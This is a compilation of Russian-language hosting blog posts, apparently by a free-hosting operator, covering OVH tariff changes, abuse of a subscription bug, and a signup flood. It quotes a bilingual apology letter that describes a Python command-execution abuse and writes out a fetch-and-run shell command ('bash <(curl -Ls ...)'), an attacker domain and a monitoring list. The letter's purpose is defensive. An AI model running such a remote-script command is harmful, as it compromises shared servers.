короче ОВХ отменило плату за установку
отменило подписку на 1-2 года обязательства, уже писал

сбросила везде по 10-20-30 евро в зависимости от тарифа
НО так же создала и 32 озу тарифы, там где их не было и были только 64 озу тарифы, притом цена 64 перекочевала на 32, а 64 стали дороже ) я так понимаю у них просто на складах остались плашки всякие и они их решили тоже утилизировать вместе с тем же железом, которое уже больше не закупается

так же произошли изменения в каналах
100 мегабит менялось на 300 мегабит, а потом и на 500
250 менялось на 500, а потом и на 1 гигабит
1 гиг менялся на 3 гига сразу
плюс на всех конфигах появилась возможность докупить 2 гига 3 гига или более свежие тарифы до 5 гиг до 10 гиг
так же появились тарифы с 50 гигами локальной сети в комплекте

вообще ход на 3 гигабита — у них вышел удачный
я уже писал что 100г продал буквально за вечер

1 гиг — уже никого особо не удивляло
3 гига — уже смотрится современно для 2025 года, ДАЖЕ ПРИ УСЛОВИИ что мне это не нужно, но чисто психологически смотрится уже ИНАЧЕ

и вот даже например обычный блоггер типо меня, если захочет «обновить свои серверы» которые не обновлял с 2018 года под блоги.
да, там нагрузки на трафик нету и даже 100 мегабит за глаза
НО человек хочет для своего любимого блога хороший сервер и как-то менять 500 мегабит на 1 гиг и потом еще «10 лет пока не сгорит» не охота
вот я сейчас склоняюсь к тому, что лучше я заплачу за более дорогие серваки, да за 10 лет я отдам больше денег, но все же лучше куплю 32 озу из линейки где дается 3 гига в комплекте. зачем? просто так на будущее, может пригодится.

так что чисто потребительский эффект новизны
считаю с выходом 3 гигабитных серверов — у них удался на 100%

что такое подписка?
это когда предлагалось согласиться на услугу на оплату на 1 год или 2 года, но получить
1. получить бесплатную установку
2. какую-то скидку. сначала там были шикарные скидки. но потом каждый год они падали и упали до жалких 5% которые уже почти ничего не экономили, а риск «остаться с продлением на 2 лет» был велик
по началу шел шикарный спрос(как оказалось из-за бага) и Олес даже хотел сделать на 5 лет подписку, но так и не сделал

подписка появилась в 2020
5 лет назад
и похоже концепция такой услуги себя не оправдала

не буду говорить согласен ли я с тем, что это был полный провал или не согласен
ХУЙ знает, мое мнение — были и плюсы и минусы

просто расскажу факты истории

с подпиской можно было продавать по разным ценам


в начале когда эту подписку ввели
она была баговая
короче можно было заказывать по подписке БЕЗ УСТАНОВКИ и просто не продлять сервер и он отключался как обычный сервер и удалялся
год или пару — реселлеры так продавали «дешевле чем у ОВХ»

потом сотрудники начали портить жизнь таким читерам
и стали переводить аккаунты на принудительное авто-продление чтобы серверы не отключались
тогда что стали делать реселлеры?
они стали выкидывать такие «подписочные» серверы в пустые аккаунты где сервер продлялся в минус и потом удалялся
короче стали выкидывать на мусорные аккаунты

тогда что сотрудники сделали?
они запретили возможность переносить серверы, если на них была подписка
да, тут сразу началось попадалово, в течение 2х летней подписке шанс что клиент откажется от сервера — 90%
но считаю это был честный обмен, сначала клиенты попытались через баги сэкономить и потом баги починились и где-то пришлось продлять серверы в пустую и потерять деньги. никто не в обиде, как говорится «сам виноват».

НО я думаю подписку удалили не из-за того, что они заебались воевать с читерами
а потому что пришло ДОЛГОЖДАННОЕ крутое обновление тарифов. в 2024 году ОВХ снова стало делать крутые обновления и подниматься.
и вот весь народ — захотел обновиться на новые серверы
а у них допустим — подписка
и что?
кому приятно сидеть и целых 2 года продлять ПО СТАРОЙ цене сервер, который НОВЫЙ можно купить в 2 раза дешевле
все начали ныть наверно как отменить эту ебучую подписку
потому что подписка портила мораль. вот есть довольный клиент, который любит новинки ОВХ и он видит новые тарифы — и он хочет на радостях попробовать новые тарифы. но подписка заставляет его грустно продлять говно и мораль портится, клиент не может попробовать новинку, а так же еще чувствует что тратит деньги на мусор столетний.
думаю именно это и послужило триггером к отмене подобной хуйни в принципе на всех тарифах

итого что можно сказать?
подписка как средство экономии — это хороший метод рекламы
но только если компания не планирует обновлять свои тарифные планы лет 10
а если вы являетесь современной компанией идущей в ногу со временем, то подобные подписки хуйня обыкновенная, потому что в современных компаниях люди постоянно каждый год, каждые 2 года покупают «новинки» и обновляются.
бывают конечно специфичные задачи типо на 10-15 лет пока не сгорит. и даже старый сервер не хочется в таком случае обновлять. НО как обычно случается? этот самый тот же самый старый сервер начинает стоить в 2 раза дешевле. и просто грустно смотреть, как ты оплачиваешь старый заказ, пусть и нужный заказ который ты так или иначе хочешь продлять 15 лет, но грустно смотреть как ты эти 15 лет продляешь по старой цене, когда видишь на прилавке тот же самый товар по новой цене в два раза дешевле. и поэтому даже тот, кто не планировал обновлять сервер, из-за всяких вечных изменений цены — начинает хотеть поменять старый на новый.

Но селектел похоже считает что незачем держать 2 точки входа при заказе

Когда в 2021 сгорел SBG2
Он заявил



Но шли годы — ничего этого не происходило
Я даже как-то иронизировал


Но на новой линейке
Которая уже ДВАЖДЫ разлетелась как пирожки
hosting.show/alice2k-hosting/na-etom-fone-ekzemplyary-do-linode-vultr-stoimostyu-5-vyglyadyat-ustarevshimi-s.html
hosting.show/alice2k-hosting/o-vizhu-v-evrope-poyavitsya-gpu-a-to-tolko-v-rf-bylo-raznoobrazie.html



Бекапы в ОВХ действительно стали БЕСПЛАТНЫ

начало
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html


Сайтов на питоне нет — я все удалил
Нет не одного питон процесса в списке процессов
Но увы — не удаляется.







Короче 1 процесс жрет 60 мб
1 ТБ озу сервер это 1000000 мб
/ 16000 процессов
допустим по 5 процессов на человека
16000/5 = 3200 аккаунтов

И это кстати хороший пример того что означает «слабый хостинг».
Вот я писал много раз про слабые облака или что-ниб еще.
Пришел наплыв заказов — продукт не справился. Так как там было 32 озу 128 озу и 16 озу и 16 озу всего лишь 4 сервера бомжа, для бесплатного то хостинга.
Но любой нормальный хостинг, например таймвеб или регру которые считают себя лидерами должен в запасе иметь думаю около 10 ТБ озу чтобы в случае чего не опозориться.
Тоже самое с ВДС я писал уже ранее

Я конечно своим проебом это не считаю — так как услугу бесплатного хостинга я и не планировал масштабировать. Но если бы я серьезно задумался сделать «хостинг сайтов» то только 10 ТБ озу запаса — только так.

кстати идею с каталогом Авито мне так никто и не реализовал
а ведь если бы существовал такой специальный сайт каталог — железо б/у разлеталось бы как пирожки

начало интересного случая с дырявой ISPmanager
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html

I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.

Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.

To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.

In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.

Technical Analysis and Recommendations

The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).

Here are several layered defense strategies to prevent this:

Immediate Mitigation: Network Egress Filtering

This is the fastest way to stop the current attack.

Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.

Core Solution: Restrict the Execution Environment

This is the fundamental, long-term solution.

Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.

Detection and Monitoring

This allows you to detect and respond to threats in real-time.

Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.

Summary of Recommendations

Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.

Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.

Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.

I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.

Sincerely,

Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.

Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.

Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.

Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.

Технический анализ и рекомендации

Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).

Вот несколько многоуровневых стратегий защиты для предотвращения этого:

Немедленное смягчение: Фильтрация исходящего сетевого трафика

Это самый быстрый способ остановить текущую атаку.

Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.

Основное решение: Ограничьте среду выполнения

Это фундаментальное долгосрочное решение.

Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.

Обнаружение и мониторинг

Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.

Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).

Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.

Резюме рекомендаций

Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.

Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.

Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.

Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.

С уважением,

короче кто-то прорекламировал в китай-нете мой бесплатный хостинг очередную попытку, прошлые бесплатные я закрывал из-за никому ненужности много раз на протяжении 15 лет
который не пользовался спросом и 10 человек может быть отсилы им пользовались

и случился наплыв регистраций
ранее уже было что-то такое, под XRAY VPN
но там было человек 20-30 с китая не более

в тот раз я пытался залимитировать какой-то Xray но не удалось
пришлось просто из тех 30 человек забанить половину и все

в этот раз зарегистрировалось аж почти 2000 человек






собственно ISPmanager не смогла даже создать 500 аккаунтов и уже зависла сразу померла
но в этот раз китайцы устанавливали Питон приложения или Node-JS приложения
hosting.show/alice2k-hosting/u-ispmanager-snova-utechki-bagov---limity-v-paneli-ne-rabotayut.html

сначала я подумал что это клоны и боты
но нет, это все реальные люди
и даже часть из них потом после регистрации когда поняла что «нихуя бесплатный хостинг не выдается»
просто хотела удалить свой аккаунт
23 человека хотели удалиться


в данном случае мой бесплатный хостинг с 32 озу серверами бомжами от ОВХ по 10 евро или 128 озу даже ненужным на коло в москве — не справился с задачей
я бы раздал каждому китайцу по 100 мегабайт на 1 аккаунт ISPmanager — мне не жалко
но как мы поняли — ISPmanager не умеет лимитировать ОЗУ

поэтому теперь останется ждать когда старые серверы на 768 озу или даже 1 ТБ — станут морально старые и гнилые
и потом когда-ниб
мы еще вернемся к бесплатному хостингу для китайцев

если бы биллинг умел в аналитику

я бы узнал откуда они пришли
но к сожалению понятия не имею где кинули ссылку на мой проект

rossetimr.ru/press/company_news/item252508.php

С начала 2025 года «Россети Московский регион» выявили 145 663 нелегальных проводов волоконно‑оптических линий связи (ВОЛС), размещённых на опорах линий электропередачи компании. По словам «Россетей», захламлённость опорных сооружений незаконными проводами мешает проведению плановых и восстановительных работ, а также создаёт угрозу стабильной работе электросетевого оборудования.

Мы в 2001-2006 годах когда в школе еще учились
Спиливали будучи школьниками замки на проход на крышу домов и сами там витую пару прокладывали
И строили домовые районные локальные сети
А на новостройках того времени еще обычно спутниковый интернет ставился в складчину и как раз его потом раздавали по локалке

Потом все эти сети у нас отобрали «местные интернет провайдеры»